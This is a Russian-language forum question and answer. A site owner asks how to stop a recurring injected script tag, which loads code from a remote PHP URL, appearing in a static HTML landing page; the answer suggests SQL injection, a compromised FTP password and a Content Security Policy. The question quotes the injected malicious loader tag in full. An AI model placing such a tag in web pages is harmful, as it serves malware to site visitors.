Как защитить сайт html от вставки вредоносного содержимого js?

Question

У меня есть хостинг с большим количеством сайтов в корневой папке. Конечно, многие из них имеют старый двигатель и версию CMS. Многие папки назначаются другому домену.

На одном из сайтов есть только html + css целевая страница. И каждую неделю появляется почти такая же строка javascript:

<!--9c3bd3--><script type="text/javascript" src="http://giagaga.ru/2wcgz6nk.php?id=3836829"></script><!--/9c3bd3--> 

Я удаляю, но это происходит снова. Более того, когда я вхожу на сайт, появляется красный экран, и Google обнаруживает, что обнаружено вредоносное ПО (из-за этого js-скрипта).

Как я могу защитить свой веб-сайт html? Может быть, добавить что-то в .htaccess?

Answer 1

Если ваш сайт позволяет пользователям вводить данные, у вас может возникнуть проблема с SQL-инъекцией. Вот некоторые документы:

• http://www.w3schools.com/sql/sql_injection.asp
• http://en.wikipedia.org/wiki/SQL_injection
• http://php.net/manual/en/security.database.sql-injection.php

Если проблема загруженное сценарий, то кто-то может иметь доступ к FTP, вы можете рассмотреть вопрос об изменении пароля для этого, если у вас нет Уже. Однако, если вы уже изменили свой пароль, и ваш сайт не позволяет вводить данные пользователя, вы можете настроить политику безопасности содержимого, которая позволит загружать скрипты с вашего сайта только на работу. http://giagaga.ru/2wcgz6nk.php?id=3836829 не загружается на страницу.

Изображение взято из HTML5Rocks tutorial page